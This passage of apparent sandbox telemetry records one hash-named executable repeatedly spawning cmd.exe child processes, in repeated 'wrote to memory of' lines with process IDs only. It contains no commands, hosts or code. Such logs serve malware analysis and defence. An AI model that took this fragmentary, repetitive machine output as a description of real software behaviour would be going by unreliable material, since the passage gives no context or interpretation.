1032 wrote to memory of 1400 1032 cmd.exe 130 PID 1032 wrote to memory of 1400 1032 cmd.exe 130 PID 1032 wrote to memory of 1400 1032 cmd.exe 130 PID 1032 wrote to memory of 1400 1032 cmd.exe 130 PID 616 wrote to memory of 1644 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 131 PID 616 wrote to memory of 1644 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 131 PID 616 wrote to memory of 1644 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 131 PID 616 wrote to memory of 1644 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 131 PID 1644 wrote to memory of 1560 1644 cmd.exe 133 PID 1644 wrote to memory of 1560 1644 cmd.exe 133 PID 1644 wrote to memory of 1560 1644 cmd.exe 133 PID 1644 wrote to memory of 1560 1644 cmd.exe 133 PID 1644 wrote to memory of 832 1644 cmd.exe 134 PID 1644 wrote to memory of 832 1644 cmd.exe 134 PID 1644 wrote to memory of 832 1644 cmd.exe 134 PID 1644 wrote to memory of 832 1644 cmd.exe 134 PID 1644 wrote to memory of 1796 1644 cmd.exe 135 PID 1644 wrote to memory of 1796 1644 cmd.exe 135 PID 1644 wrote to memory of 1796 1644 cmd.exe 135 PID 1644 wrote to memory of 1796 1644 cmd.exe 135 PID 1796 wrote to memory of 1188 1796 cmd.exe 136 PID 1796 wrote to memory of 1188 1796 cmd.exe 136 PID 1796 wrote to memory of 1188 1796 cmd.exe 136 PID 1796 wrote to memory of 1188 1796 cmd.exe 136 PID 1644 wrote to memory of 1060 1644 cmd.exe 137 PID 1644 wrote to memory of 1060 1644 cmd.exe 137 PID 1644 wrote to memory of 1060 1644 cmd.exe 137 PID 1644 wrote to memory of 1060 1644 cmd.exe 137 PID 616 wrote to memory of 2036 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 138 PID 616 wrote to memory of 2036 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 138 PID 616 wrote to memory of 2036 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 138 PID 616 wrote to memory of 2036 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 138 PID 2036 wrote to memory of 884 2036 cmd.exe 140 PID 2036 wrote to memory of 884 2036 cmd.exe 140 PID 2036 wrote to memory of 884 2036 cmd.exe 140 PID 2036 wrote to memory of 884 2036 cmd.exe 140 PID 2036 wrote to memory of 1996 2036 cmd.exe 141 PID 2036 wrote to memory of 1996 2036 cmd.exe 141 PID 2036 wrote to memory of 1996 2036 cmd.exe 141 PID 2036 wrote to memory of 1996 2036 cmd.exe 141 PID 2036 wrote to memory of 1092 2036 cmd.exe 142 PID 2036 wrote to memory of 1092 2036 cmd.exe 142 PID 2036 wrote to memory of 1092 2036 cmd.exe 142 PID 2036 wrote to memory of 1092 2036 cmd.exe 142 PID 1092 wrote to memory of 1492 1092 cmd.exe 143 PID 1092 wrote to memory of 1492 1092 cmd.exe 143 PID 1092 wrote to memory of 1492 1092 cmd.exe 143 PID 1092 wrote to memory of 1492 1092 cmd.exe 143 PID 2036 wrote to memory of 1136 2036 cmd.exe 144 PID 2036 wrote to memory of 1136 2036 cmd.exe 144 PID 2036 wrote to memory of 1136 2036 cmd.exe 144 PID 2036 wrote to memory of 1136 2036 cmd.exe 144 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 145 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 145 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 145 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 145 PID 972 wrote to memory of 920 972 cmd.exe 147 PID 972 wrote to memory of 920 972 cmd.exe 147 PID 972 wrote to memory of 920 972 cmd.exe 147 PID 972 wrote to memory of 920 972 cmd.exe 147 PID 972 wrote to memory of 1488 972 cmd.exe 148 PID 972 wrote to memory of 1488 972 cmd.exe 148 PID 972 wrote to memory of 1488 972 cmd.exe 148 PID 972 wrote to memory of 1488 972 cmd.exe 148 PID 972 wrote to memory of 1640 972 cmd.exe 149 PID 972 wrote to memory of 1640 972 cmd.exe 149 PID 972 wrote to memory of 1640 972 cmd.exe 149 PID 972 wrote to memory of 1640 972 cmd.exe 149 PID 1640 wrote to memory of 1880 1640 cmd.exe 150 PID 1640 wrote to memory of 1880 1640 cmd.exe 150 PID 1640 wrote to memory of 1880 1640 cmd.exe 150 PID 1640 wrote to memory of 1880 1640 cmd.exe 150 PID 972 wrote to memory of 1556 972 cmd.exe 151 PID 972 wrote to memory of 1556 972 cmd.exe 151 PID 972 wrote to memory of 1556 972 cmd.exe 151 PID 972 wrote to memory of 1556 972 cmd.exe 151 PID 616 wrote to memory of 1232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 152 PID 616 wrote to memory of 1232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 152 PID 616 wrote to memory of 1232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 152 PID 616 wrote to memory of 1232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 152 PID 1232 wrote to memory of 1032 1232 cmd.exe 154 PID 1232 wrote to memory of 1032 1232 cmd.exe 154 PID 1232 wrote to memory of 1032 1232 cmd.exe 154 PID 1232 wrote to memory of 1032 1232 cmd.exe 154 PID 1232 wrote to memory of 1120 1232 cmd.exe 155 PID 1232 wrote to memory of 1120 1232 cmd.exe 155 PID 1232 wrote to memory of 1120 1232 cmd.exe 155 PID 1232 wrote to memory of 1120 1232 cmd.exe 155 PID 1232 wrote to memory of 796 1232 cmd.exe 156 PID 1232 wrote to memory of 796 1232 cmd.exe 156 PID 1232 wrote to memory of 796 1232 cmd.exe 156 PID 1232 wrote to memory of 796 1232 cmd.exe 156 PID 796 wrote to memory of 2040 796 cmd.exe 157 PID 796 wrote to memory of 2040 796 cmd.exe 157 PID 796 wrote to memory of 2040 796 cmd.exe 157 PID 796 wrote to memory of 2040 796 cmd.exe 157 PID 1232 wrote to memory of 1408 1232 cmd.exe 158 PID 1232 wrote to memory of 1408 1232 cmd.exe 158 PID 1232 wrote to memory of 1408 1232 cmd.exe 158 PID 1232 wrote to memory of 1408 1232 cmd.exe 158 PID 616 wrote to memory of 1824 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 159 PID 616 wrote to memory of 1824 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 159 PID 616 wrote to memory of 1824 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 159 PID 616 wrote to memory of 1824 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 159 PID 1824 wrote to memory of 1640 1824 cmd.exe 161 PID 1824 wrote to memory of 1640 1824 cmd.exe 161 PID 1824 wrote to memory of 1640 1824 cmd.exe 161 PID 1824 wrote to memory of 1640 1824 cmd.exe 161 PID 1824 wrote to memory of 1468 1824 cmd.exe 162 PID 1824 wrote to memory of 1468 1824 cmd.exe 162 PID 1824 wrote to memory of 1468 1824 cmd.exe 162 PID 1824 wrote to memory of 1468 1824 cmd.exe 162 PID 1824 wrote to memory of 2012 1824 cmd.exe 163 PID 1824 wrote to memory of 2012 1824 cmd.exe 163 PID 1824 wrote to memory of 2012 1824 cmd.exe 163 PID 1824 wrote to memory of 2012 1824 cmd.exe 163 PID 2012 wrote to memory of 972 2012 cmd.exe 164 PID 2012 wrote to memory of 972 2012 cmd.exe 164 PID 2012 wrote to memory of 972 2012 cmd.exe 164 PID 2012 wrote to memory of 972 2012 cmd.exe 164 PID 1824 wrote to memory of 1020 1824 cmd.exe 165 PID 1824 wrote to memory of 1020 1824 cmd.exe 165 PID 1824 wrote to memory of 1020 1824 cmd.exe 165 PID 1824 wrote to memory of 1020 1824 cmd.exe 165 PID 616 wrote to memory of 1032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 166 PID 616 wrote to memory of 1032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 166 PID 616 wrote to memory of 1032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 166 PID 616 wrote to memory of 1032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 166 PID 1032 wrote to memory of 1332 1032 cmd.exe 168 PID 1032 wrote to memory of 1332 1032 cmd.exe 168 PID 1032 wrote to memory of 1332 1032 cmd.exe 168 PID 1032 wrote to memory of 1332 1032 cmd.exe 168 PID 1032 wrote to memory of 1960 1032 cmd.exe 169 PID 1032 wrote to memory of 1960 1032 cmd.exe 169 PID 1032 wrote to memory of 1960 1032 cmd.exe 169 PID 1032 wrote to memory of 1960 1032 cmd.exe 169 PID 1032 wrote to memory of 1832 1032 cmd.exe 170 PID 1032 wrote to memory of 1832 1032 cmd.exe 170 PID 1032 wrote to memory of 1832 1032 cmd.exe 170 PID 1032 wrote to memory of 1832 1032 cmd.exe 170 PID 1832 wrote to memory of 564 1832 cmd.exe 171 PID 1832 wrote to memory of 564 1832 cmd.exe 171 PID 1832 wrote to memory of 564 1832 cmd.exe 171 PID 1832 wrote to memory of 564 1832 cmd.exe 171 PID 1032 wrote to memory of 1796 1032 cmd.exe 172 PID 1032 wrote to memory of 1796 1032 cmd.exe 172 PID 1032 wrote to memory of 1796 1032 cmd.exe 172 PID 1032 wrote to memory of 1796 1032 cmd.exe 172 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 173 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 173 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 173 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 173 PID 1944 wrote to memory of 1956 1944 cmd.exe 175 PID 1944 wrote to memory of 1956 1944 cmd.exe 175 PID 1944 wrote to memory of 1956 1944 cmd.exe 175 PID 1944 wrote to memory of 1956 1944 cmd.exe 175 PID 1944 wrote to memory of 2012 1944 cmd.exe 176 PID 1944 wrote to memory of 2012 1944 cmd.exe 176 PID 1944 wrote to memory of 2012 1944 cmd.exe 176 PID 1944 wrote to memory of 2012 1944 cmd.exe 176 PID 1944 wrote to memory of 472 1944 cmd.exe 177 PID 1944 wrote to memory of 472 1944 cmd.exe 177 PID 1944 wrote to memory of 472 1944 cmd.exe 177 PID 1944 wrote to memory of 472 1944 cmd.exe 177 PID 472 wrote to memory of 1060 472 cmd.exe 178 PID 472 wrote to memory of 1060 472 cmd.exe 178 PID 472 wrote to memory of 1060 472 cmd.exe 178 PID 472 wrote to memory of 1060 472 cmd.exe 178 PID 1944 wrote to memory of 1584 1944 cmd.exe 179 PID 1944 wrote to memory of 1584 1944 cmd.exe 179 PID 1944 wrote to memory of 1584 1944 cmd.exe 179 PID 1944 wrote to memory of 1584 1944 cmd.exe 179 PID 616 wrote to memory of 796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 180 PID 616 wrote to memory of 796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 180 PID 616 wrote to memory of 796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 180 PID 616 wrote to memory of 796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 180 PID 796 wrote to memory of 1868 796 cmd.exe 182 PID 796 wrote to memory of 1868 796 cmd.exe 182 PID 796 wrote to memory of 1868 796 cmd.exe 182 PID 796 wrote to memory of 1868 796 cmd.exe 182 PID 860 wrote to memory of 1776 860 cmd.exe 183 PID 860 wrote to memory of 1776 860 cmd.exe 183 PID 860 wrote to memory of 1776 860 cmd.exe 183 PID 796 wrote to memory of 1880 796 cmd.exe 184 PID 796 wrote to memory of 1880 796 cmd.exe 184 PID 796 wrote to memory of 1880 796 cmd.exe 184 PID 796 wrote to memory of 1880 796 cmd.exe 184 PID 796 wrote to memory of 1136 796 cmd.exe 185 PID 796 wrote to memory of 1136 796 cmd.exe 185 PID 796 wrote to memory of 1136 796 cmd.exe 185 PID 796 wrote to memory of 1136 796 cmd.exe 185 PID 1136 wrote to memory of 1964 1136 cmd.exe 186 PID 1136 wrote to memory of 1964 1136 cmd.exe 186 PID 1136 wrote to memory of 1964 1136 cmd.exe 186 PID 1136 wrote to memory of 1964 1136 cmd.exe 186 PID 796 wrote to memory of 1212 796 cmd.exe 187 PID 796 wrote to memory of 1212 796 cmd.exe 187 PID 796 wrote to memory of 1212 796 cmd.exe 187 PID 796 wrote to memory of 1212 796 cmd.exe 187 PID 616 wrote to memory of 1092 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 188 PID 616 wrote to memory of 1092 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 188 PID 616 wrote to memory of 1092 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 188 PID 616 wrote to memory of 1092 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 188 PID 1092 wrote to memory of 1060 1092 cmd.exe 190 PID 1092 wrote to memory of 1060 1092 cmd.exe 190 PID 1092 wrote to memory of 1060 1092 cmd.exe 190 PID 1092 wrote to memory of 1060 1092 cmd.exe 190 PID 1092 wrote to memory of 2040 1092 cmd.exe 191 PID 1092 wrote to memory of 2040 1092 cmd.exe 191 PID 1092 wrote to memory of 2040 1092 cmd.exe 191 PID 1092 wrote to memory of 2040 1092 cmd.exe 191 PID 1092 wrote to memory of 1640 1092 cmd.exe 192 PID 1092 wrote to memory of 1640 1092 cmd.exe 192 PID 1092 wrote to memory of 1640 1092 cmd.exe 192 PID 1092 wrote to memory of 1640 1092 cmd.exe 192 PID 1640 wrote to memory of 204 1640 cmd.exe 193 PID 1640 wrote to memory of 204 1640 cmd.exe 193 PID 1640 wrote to memory of 204 1640 cmd.exe 193 PID 1640 wrote to memory of 204 1640 cmd.exe 193 PID 1092 wrote to memory of 224 1092 cmd.exe 194 PID 1092 wrote to memory of 224 1092 cmd.exe 194 PID 1092 wrote to memory of 224 1092 cmd.exe 194 PID 1092 wrote to memory of 224 1092 cmd.exe 194 PID 616 wrote to memory of 1808 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 195 PID 616 wrote to memory of 1808 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 195 PID 616 wrote to memory of 1808 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 195 PID 616 wrote to memory of 1808 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 195 PID 1808 wrote to memory of 564 1808 cmd.exe 197 PID 1808 wrote to memory of 564 1808 cmd.exe 197 PID 1808 wrote to memory of 564 1808 cmd.exe 197 PID 1808 wrote to memory of 564 1808 cmd.exe 197 PID 1808 wrote to memory of 1868 1808 cmd.exe 198 PID 1808 wrote to memory of 1868 1808 cmd.exe 198 PID 1808 wrote to memory of 1868 1808 cmd.exe 198 PID 1808 wrote to memory of 1868 1808 cmd.exe 198 PID 1808 wrote to memory of 436 1808 cmd.exe 199 PID 1808 wrote to memory of 436 1808 cmd.exe 199 PID 1808 wrote to memory of 436 1808 cmd.exe 199 PID 1808 wrote to memory of 436 1808 cmd.exe 199 PID 436 wrote to memory of 1216 436 cmd.exe 200 PID 436 wrote to memory of 1216 436 cmd.exe 200 PID 436 wrote to memory of 1216 436 cmd.exe 200 PID 436 wrote to memory of 1216 436 cmd.exe 200 PID 1808 wrote to memory of 1212 1808 cmd.exe 201 PID 1808 wrote to memory of 1212 1808 cmd.exe 201 PID 1808 wrote to memory of 1212 1808 cmd.exe 201 PID 1808 wrote to memory of 1212 1808 cmd.exe 201 PID 616 wrote to memory of 796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 202 PID 616 wrote to memory of 796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 202 PID 616 wrote to memory of 796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 202 PID 616 wrote to memory of 796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 202 PID 796 wrote to memory of 1228 796 cmd.exe 204 PID 796 wrote to memory of 1228 796 cmd.exe 204 PID 796 wrote to memory of 1228 796 cmd.exe 204 PID 796 wrote to memory of 1228 796 cmd.exe 204 PID 796 wrote to memory of 1060 796 cmd.exe 205 PID 796 wrote to memory of 1060 796 cmd.exe 205 PID 796 wrote to memory of 1060 796 cmd.exe 205 PID 796 wrote to memory of 1060 796 cmd.exe 205 PID 796 wrote to memory of 220 796 cmd.exe 207 PID 796 wrote to memory of 220 796 cmd.exe 207 PID 796 wrote to memory of 220 796 cmd.exe 207 PID 796 wrote to memory of 220 796 cmd.exe 207 PID 220 wrote to memory of 232 220 cmd.exe 208 PID 220 wrote to memory of 232 220 cmd.exe 208 PID 220 wrote to memory of 232 220 cmd.exe 208 PID 220 wrote to memory of 232 220 cmd.exe 208 PID 796 wrote to memory of 1408 796 cmd.exe 209 PID 796 wrote to memory of 1408 796 cmd.exe 209 PID 796 wrote to memory of 1408 796 cmd.exe 209 PID 796 wrote to memory of 1408 796 cmd.exe 209 PID 616 wrote to memory of 1684 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 210 PID 616 wrote to memory of 1684 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 210 PID 616 wrote to memory of 1684 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 210 PID 616 wrote to memory of 1684 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 210 PID 1684 wrote to memory of 1956 1684 cmd.exe 212 PID 1684 wrote to memory of 1956 1684 cmd.exe 212 PID 1684 wrote to memory of 1956 1684 cmd.exe 212 PID 1684 wrote to memory of 1956 1684 cmd.exe 212 PID 1684 wrote to memory of 1120 1684 cmd.exe 213 PID 1684 wrote to memory of 1120 1684 cmd.exe 213 PID 1684 wrote to memory of 1120 1684 cmd.exe 213 PID 1684 wrote to memory of 1120 1684 cmd.exe 213 PID 1684 wrote to memory of 1680 1684 cmd.exe 214 PID 1684 wrote to memory of 1680 1684 cmd.exe 214 PID 1684 wrote to memory of 1680 1684 cmd.exe 214 PID 1684 wrote to memory of 1680 1684 cmd.exe 214 PID 1680 wrote to memory of 360 1680 cmd.exe 215 PID 1680 wrote to memory of 360 1680 cmd.exe 215 PID 1680 wrote to memory of 360 1680 cmd.exe 215 PID 1680 wrote to memory of 360 1680 cmd.exe 215 PID 1684 wrote to memory of 1828 1684 cmd.exe 216 PID 1684 wrote to memory of 1828 1684 cmd.exe 216 PID 1684 wrote to memory of 1828 1684 cmd.exe 216 PID 1684 wrote to memory of 1828 1684 cmd.exe 216 PID 616 wrote to memory of 1228 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 217 PID 616 wrote to memory of 1228 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 217 PID 616 wrote to memory of 1228 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 217 PID 616 wrote to memory of 1228 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 217 PID 1228 wrote to memory of 232 1228 cmd.exe 219 PID 1228 wrote to memory of 232 1228 cmd.exe 219 PID 1228 wrote to memory of 232 1228 cmd.exe 219 PID 1228 wrote to memory of 232 1228 cmd.exe 219 PID 860 wrote to memory of 1340 860 cmd.exe 221 PID 860 wrote to memory of 1340 860 cmd.exe 221 PID 860 wrote to memory of 1340 860 cmd.exe 221 PID 1228 wrote to memory of 1960 1228 cmd.exe 220 PID 1228 wrote to memory of 1960 1228 cmd.exe 220 PID 1228 wrote to memory of 1960 1228 cmd.exe 220 PID 1228 wrote to memory of 1960 1228 cmd.exe 220 PID 1228 wrote to memory of 920 1228 cmd.exe 222 PID 1228 wrote to memory of 920 1228 cmd.exe 222 PID 1228 wrote to memory of 920 1228 cmd.exe 222 PID 1228 wrote to memory of 920 1228 cmd.exe 222 PID 920 wrote to memory of 680 920 cmd.exe 223 PID 920 wrote to memory of 680 920 cmd.exe 223 PID 920 wrote to memory of 680 920 cmd.exe 223 PID 920 wrote to memory of 680 920 cmd.exe 223 PID 1228 wrote to memory of 832 1228 cmd.exe 224 PID 1228 wrote to memory of 832 1228 cmd.exe 224 PID 1228 wrote to memory of 832 1228 cmd.exe 224 PID 1228 wrote to memory of 832 1228 cmd.exe 224 PID 616 wrote to memory of 1120 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 225 PID 616 wrote to memory of 1120 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 225 PID 616 wrote to memory of 1120 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 225 PID 616 wrote to memory of 1120 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 225 PID 1120 wrote to memory of 672 1120 cmd.exe 227 PID 1120 wrote to memory of 672 1120 cmd.exe 227 PID 1120 wrote to memory of 672 1120 cmd.exe 227 PID 1120 wrote to memory of 672 1120 cmd.exe 227 PID 1120 wrote to memory of 1784 1120 cmd.exe 228 PID 1120 wrote to memory of 1784 1120 cmd.exe 228 PID 1120 wrote to memory of 1784 1120 cmd.exe 228 PID 1120 wrote to memory of 1784 1120 cmd.exe 228 PID 860 wrote to memory of 1076 860 cmd.exe 229 PID 860 wrote to memory of 1076 860 cmd.exe 229 PID 860 wrote to memory of 1076 860 cmd.exe 229 PID 860 wrote to memory of 688 860 cmd.exe 231 PID 860 wrote to memory of 688 860 cmd.exe 231 PID 860 wrote to memory of 688 860 cmd.exe 231 PID 1120 wrote to memory of 1680 1120 cmd.exe 230 PID 1120 wrote to memory of 1680 1120 cmd.exe 230 PID 1120 wrote to memory of 1680 1120 cmd.exe 230 PID 1120 wrote to memory of 1680 1120 cmd.exe 230 PID 1680 wrote to memory of 1684 1680 cmd.exe 232 PID 1680 wrote to memory of 1684 1680 cmd.exe 232 PID 1680 wrote to memory of 1684 1680 cmd.exe 232 PID 1680 wrote to memory of 1684 1680 cmd.exe 232 PID 1120 wrote to memory of 220 1120 cmd.exe 233 PID 1120 wrote to memory of 220 1120 cmd.exe 233 PID 1120 wrote to memory of 220 1120 cmd.exe 233 PID 1120 wrote to memory of 220 1120 cmd.exe 233 PID 616 wrote to memory of 208 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 234 PID 616 wrote to memory of 208 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 234 PID 616 wrote to memory of 208 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 234 PID 616 wrote to memory of 208 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 234 PID 208 wrote to memory of 1020 208 cmd.exe 236 PID 208 wrote to memory of 1020 208 cmd.exe 236 PID 208 wrote to memory of 1020 208 cmd.exe 236 PID 208 wrote to memory of 1020 208 cmd.exe 236 PID 208 wrote to memory of 1868 208 cmd.exe 237 PID 208 wrote to memory of 1868 208 cmd.exe 237 PID 208 wrote to memory of 1868 208 cmd.exe 237 PID 208 wrote to memory of 1868 208 cmd.exe 237 PID 208 wrote to memory of 680 208 cmd.exe 238 PID 208 wrote to memory of 680 208 cmd.exe 238 PID 208 wrote to memory of 680 208 cmd.exe 238 PID 208 wrote to memory of 680 208 cmd.exe 238 PID 680 wrote to memory of 1996 680 cmd.exe 239 PID 680 wrote to memory of 1996 680 cmd.exe 239 PID 680 wrote to memory of 1996 680 cmd.exe 239 PID 680 wrote to memory of 1996 680 cmd.exe 239 PID 208 wrote to memory of 228 208 cmd.exe 240 PID 208 wrote to memory of 228 208 cmd.exe 240 PID 208 wrote to memory of 228 208 cmd.exe 240 PID 208 wrote to memory of 228 208 cmd.exe 240 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 241 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 241 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 241 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 241 PID 972 wrote to memory of 796 972 cmd.exe 243 PID 972 wrote to memory of 796 972 cmd.exe 243 PID 972 wrote to memory of 796 972 cmd.exe 243 PID 972 wrote to memory of 796 972 cmd.exe 243 PID 972 wrote to memory of 1332 972 cmd.exe 244 PID 972 wrote to memory of 1332 972 cmd.exe 244 PID 972 wrote to memory of 1332 972 cmd.exe 244 PID 972 wrote to memory of 1332 972 cmd.exe 244 PID 972 wrote to memory of 908 972 cmd.exe 245 PID 972 wrote to memory of 908 972 cmd.exe 245 PID 972 wrote to memory of 908 972 cmd.exe 245 PID 972 wrote to memory of 908 972 cmd.exe 245 PID 908 wrote to memory of 1488 908 cmd.exe 246 PID 908 wrote to memory of 1488 908 cmd.exe 246 PID 908 wrote to memory of 1488 908 cmd.exe 246 PID 908 wrote to memory of 1488 908 cmd.exe 246 PID 972 wrote to memory of 1460 972 cmd.exe 247 PID 972 wrote to memory of 1460 972 cmd.exe 247 PID 972 wrote to memory of 1460 972 cmd.exe 247 PID 972 wrote to memory of 1460 972 cmd.exe 247 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 248 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 248 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 248 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 248 PID 1944 wrote to memory of 224 1944 cmd.exe 250 PID 1944 wrote to memory of 224 1944 cmd.exe 250 PID 1944 wrote to memory of 224 1944 cmd.exe 250 PID 1944 wrote to memory of 224 1944 cmd.exe 250 PID 1944 wrote to memory of 1152 1944 cmd.exe 251 PID 1944 wrote to memory of 1152 1944 cmd.exe 251 PID 1944 wrote to memory of 1152 1944 cmd.exe 251 PID 1944 wrote to memory of 1152 1944 cmd.exe 251 PID 1944 wrote to memory of 624 1944 cmd.exe 252 PID 1944 wrote to memory of 624 1944 cmd.exe 252 PID 1944 wrote to memory of 624 1944 cmd.exe 252 PID 1944 wrote to memory of 624 1944 cmd.exe 252 PID 624 wrote to memory of 1960 624 cmd.exe 253 PID 624 wrote to memory of 1960 624 cmd.exe 253 PID 624 wrote to memory of 1960 624 cmd.exe 253 PID 624 wrote to memory of 1960 624 cmd.exe 253 PID 1944 wrote to memory of 1188 1944 cmd.exe 254 PID 1944 wrote to memory of 1188 1944 cmd.exe 254 PID 1944 wrote to memory of 1188 1944 cmd.exe 254 PID 1944 wrote to memory of 1188 1944 cmd.exe 254 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 255 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 255 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 255 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 255 PID 1956 wrote to memory of 688 1956 cmd.exe 257 PID 1956 wrote to memory of 688 1956 cmd.exe 257 PID 1956 wrote to memory of 688 1956 cmd.exe 257 